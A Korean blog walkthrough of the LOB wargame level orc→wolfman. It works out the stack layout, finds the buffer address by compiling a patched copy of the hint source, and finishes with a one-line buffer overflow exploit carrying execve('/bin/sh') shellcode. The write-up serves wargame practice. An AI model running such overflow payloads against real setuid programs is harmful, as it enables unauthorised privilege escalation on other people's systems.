본문 바로가기
Security/Pwnable

LOB Level 5 orc

by J0DEV 2021. 8. 9.
반응형

Level5 orc -> wolfman 으로 접속합니다.

 

 

우선 힌트를 봅시다!

에그헌터 있고

버퍼 초기화하는게 있네요.

전체적인 메모리구조를

RET		4
SFT		4
buffer		40  
int		4

 

이렇게 유추해봅시다. 

 

GDB로 까보면

 

main+3에서

44바이트가 할당된것을 알 수 있습니다.

4바이트	RET
4바이트	SFP
40바이트	BUFFER
4바이트	i

이제 buffer 의 주소를 알아내기 위해 

 

break걸고 살펴보려고 하는데

 

 

퍼미션...

파일을 복사해서도 해보는데

 

퍼미ㅕㅅㄴ.....

다른 방법을 찾아보던중에

 

힌트로 제공된 소스 코드를 

 

복사하여서

 

현재 버퍼의 주소를 출력해주는 코드를 추가합니다.

 

printf("0x%x\n", buffer);

 

그리고 컴파일 후 실행합니다.

 

 

 

 

 

 

버퍼의 주소를 알아냈습니다.

 

0xbffffa70

 

./wolfman `python -c 'print "A"*44 + "\x70\xfa\xff\xbf" + "A"*200+ "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

 

반응형

'Security > Pwnable' 카테고리의 다른 글

LOB Level 7 darkelf  (0) 2021.08.09
LOB Level 6 wolfman  (0) 2021.08.09
LOB Level 4 goblin  (0) 2021.08.09
LOB Level 3 cobolt  (0) 2021.08.09
LOB Level 2 gremlin  (0) 2021.08.09